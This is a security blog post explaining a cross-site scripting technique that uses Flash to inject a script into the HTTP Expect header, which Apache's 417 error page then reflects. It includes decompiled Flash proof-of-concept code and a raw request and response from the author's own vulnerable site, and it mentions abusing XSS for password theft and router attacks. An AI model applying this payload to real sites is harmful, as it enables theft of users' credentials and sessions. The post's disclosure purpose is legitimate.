XSSing with the expect header
I know that XSS is looked down upon by a lot of people in the security sphere but I feel XSS has been severely underestimated by a lot of people. Using it to steal cookies is really only the very start of it.
That’s besides the point, though I will post links to rarely used (or maybe just up and coming) uses for XSS later in this post.
Here’s HTTP Expect header as defined in the RFC:
The Expect request-header field is used to indicate that particular server behaviors are required by the client.
A server that does not understand or is unable to comply with any of the expectation values in the Expect field of a request MUST respond with appropriate error status. The server MUST respond with a 417 (Expectation Failed) status if any of the expectations cannot be met or, if there are other problems with the request, some other 4xx status.
This header field is defined with extensible syntax to allow for future extensions. If a server receives a request containing an Expect field that includes an expectation-extension that it does not support, it MUST respond with a 417 (Expectation Failed) status.
Now… how can we force a user to cause a request with the expect header in it? Well… you may know that flash can run actionscript. Action script has a function called addRequestHeader() which can add headers to a request. Now… we can force someone to use that header, how can this be used? Well… The error page given by apache will often contain the error on it (and it will cause an error because we’ll set something silly as the request value).
If we set <script>alert(‘xss’)</script> in the field then that’ll be echoed onto the page. Fast forward and we’ve got this code in a flash file:
//Credits to Amit Klein as he wrote this, I just decompiled it
inURL = this._url;
inPOS = inURL.lastIndexOf(“?”);
inParam = inURL.substring(inPOS + 1, inPOS.length);
req = new LoadVars();
alert(\'" + inParam + " is vulnerable to the Expect Header vulnerability.\');
req.send(inParam, “_blank”, “POST”);
Now we can supply a querystring of say ?http://www.whiteacid.org to the script and this is the HTTP request the flash file created
GET / HTTP/1.1
alert('http://www.whiteacid.org is vulnerable to the Expect Header vulnerability.');
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
HTTP/1.1 417 Expectation Failed
Date: Thu, 21 Sep 2006 20:44:52 GMT
Server: Apache/1.3.33 (Unix) mod_throttle/3.1.2 DAV/1.0.3 mod_fastcgi/2.4.2 mod_gzip/188.8.131.52a PHP/4.4.2 mod_ssl/2.8.22 OpenSSL/0.9.7e
Keep-Alive: timeout=5, max=100
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<TITLE>417 Expectation Failed</TITLE>
The expectation given in the Expect request-header
field could not be met by this server.<P>
The client sent<PRE>
Expect: <script>alert(‘http://www.whiteacid.org is vulnerable to the Expect Header vulnerability.’);</script>
but we only allow the 100-continue expectation.
There you go, my site is vulnerable to this form of XSS (if the victim uses IE). What can be done? Everything that normal XSS can do including phishing and… well… everything.
As for fixing this (and yes… I will get around to that), I’m not too sure yet. I know I could create a custom error page but there may be better solutions, I’m asking RSnake about that and I’ll either comment here or just update this post if/when I get that info.
The reason this doesn’t work in firefox is because it doesn’t allow or support the Request header, I’m not sure which. Oh and you may be wondering how many sites are vulnerable to this. It’s lots. Lots and lots more, including beyondsecurity.com by the way.
As for other stuff XSS can be used for. I’ve managed to steal passwords by abusing the password manager browsers like users to use. LINK.
You can mix XSS and CSRF to abuse the forgotten password feature. LINK.
You can port scan the users localhost and potentially attack their router (old firmware for my router didn’t require the admin password to reboot it, so an XSSed site could detect what router I’m using and try to reboot it).
XSS is most certainly not to be underestimated. Even this article about how titled “Hackers Reveal Vulnerable Websites” is vulnerable to XSS (read the comments)
showing you that even those developers who are aware of this slip up occasionally.
Edit: I want to make this clear, credit for the flash goes to Amit Klein and a lot goes to RSnake at ha.ckers.org for showing this to me.